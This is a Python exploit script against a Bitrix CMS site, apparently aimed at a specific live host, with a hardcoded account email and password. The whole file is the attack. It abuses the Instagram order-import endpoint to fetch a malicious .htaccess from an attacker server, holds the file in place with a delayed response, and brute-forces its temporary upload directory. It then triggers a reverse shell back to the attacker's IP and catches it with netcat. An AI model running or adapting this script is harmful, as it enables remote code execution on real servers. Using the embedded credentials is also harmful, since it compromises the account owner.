import requests import re import os import typing import time import itertools import string import subprocess import http.server from http.server import HTTPServer from socketserver import ThreadingMixIn import threading from urllib.parse import urlparse HOST = "https://icd.uz" SITE_ID = "s1" USERNAME = "a.ilkhom@gmail.com" PASSWORD = "Dir0!nfS32jpe&j" LPORT1 = 8001 LPORT2 = 9001 LHOST = "192.168.100.7" DELAY_SECONDS = 60 N_REPS = 1000 PROXY = None def nested_to_urlencoded(val: typing.Any, prefix="") -> dict: out = dict() if type(val) is dict: for k, v in val.items(): child = nested_to_urlencoded(v, prefix=f"[{k}]") for key, val in child.items(): out[prefix + key] = val elif type(val) in [list, tuple]: for i, item in enumerate(val): child = nested_to_urlencoded(item, prefix=f"[{i}]") for key, val in child.items(): out[prefix + key] = val else: out[prefix] = val return out def check_creds(cookie, sessid): return requests.get(HOST + "/bitrix/tools/public_session.php", headers={ "X-Bitrix-Csrf-Token": sessid }, cookies={ "PHPSESSID": cookie, }, proxies=PROXY).text == "OK" def login(session, username, password): if os.path.isfile("./cached-creds.txt"): cookie, sessid = open("./cached-creds.txt").read().split(":") if check_creds(cookie, sessid): session.cookies.set("PHPSESSID", cookie) print("[+] Using cached credentials") return sessid else: print("[!] Cached credentials are invalid") session.get(HOST + "/") resp = session.post( HOST + "/?login=yes", data={ "AUTH_FORM": "Y", "TYPE": "AUTH", "backurl": "/", "USER_LOGIN": username, "USER_PASSWORD": password, }, ) if session.cookies.get("BITRIX_SM_LOGIN", "") == "": print(f"[!] Invalid credentials") exit() sessid = re.search(re.compile("'bitrix_sessid':'([a-f0-9]{32})'"), resp.text).group( 1 ) print(f"[+] Logged in as {username}") with open("./cached-creds.txt", "w") as f: f.write(f"{session.cookies.get('PHPSESSID')}:{sessid}") return sessid def start_server(): class MyHandler(http.server.BaseHTTPRequestHandler): htaccess = open("./.htaccess", "rb").read() def do_GET(self): path = urlparse(self.path).path self.send_response(200) self.end_headers() # Request .htaccess if ".htaccess" in path: self.wfile.write(self.htaccess) self.wfile.flush() return # Delay print("[+] Delaying return by", DELAY_SECONDS, "seconds") # send the body of the response for i in range(DELAY_SECONDS): self.wfile.write(b"A\n") self.wfile.flush() time.sleep(1) # Shutdown server when done self.server.shutdown() def log_message(self, format: str, *args: typing.Any) -> None: # Silence logging pass class ThreadedHTTPServer(ThreadingMixIn, HTTPServer): """Handle requests in a separate thread.""" httpd = ThreadedHTTPServer(("0.0.0.0", LPORT1), MyHandler) def forever(): with httpd: httpd.serve_forever() thread = threading.Thread(target=forever, daemon=True) thread.start() print("[+] Started HTTP server on", LPORT1) return httpd def instagram_import(session, sessid): session.post( HOST + "/bitrix/services/main/ajax.php?mode=class&c=bitrix%3acrm.order.import.instagram.view&action=importAjax", data=nested_to_urlencoded([{ "IMAGES": [ f"http://{LHOST}:{LPORT1}/.htaccess" ] * N_REPS + [f"http://{LHOST}:{LPORT1}/delay"], "NAME": "Product 1" }], prefix="items" ), headers={"X-Bitrix-Csrf-Token": sessid}, ) print("[+] Waiting done") def test_exists(dir_name): resp = requests.head(f"{HOST}/upload/tmp/{dir_name}/.htaccess", proxies=PROXY) return resp.status_code == 200 def bruteforce(): print("[+] Bruteforcing .htaccess location") chars = string.digits + string.ascii_lowercase for dir_name in itertools.product(chars, repeat=3): dir_name = "".join(dir_name) if test_exists(dir_name): print(f"[+] Found .htaccess: {HOST}/upload/tmp/{dir_name}/.htaccess") return dir_name def reverse_shell(dir_name): requests.get(f"{HOST}/upload/tmp/{dir_name}/.htaccess?ip={LHOST}&port={LPORT2}", proxies=PROXY) if __name__ == "__main__": s = requests.Session() s.proxies = PROXY sessid = login(s, USERNAME, PASSWORD) start_server() threading.Thread(target=instagram_import, args=(s, sessid)).start() dir_name = bruteforce() threading.Thread(target=reverse_shell, args=(dir_name,)).start() print("[+] Waiting for reverse shell connection") subprocess.run(["nc", "-nvlp", str(LPORT2)])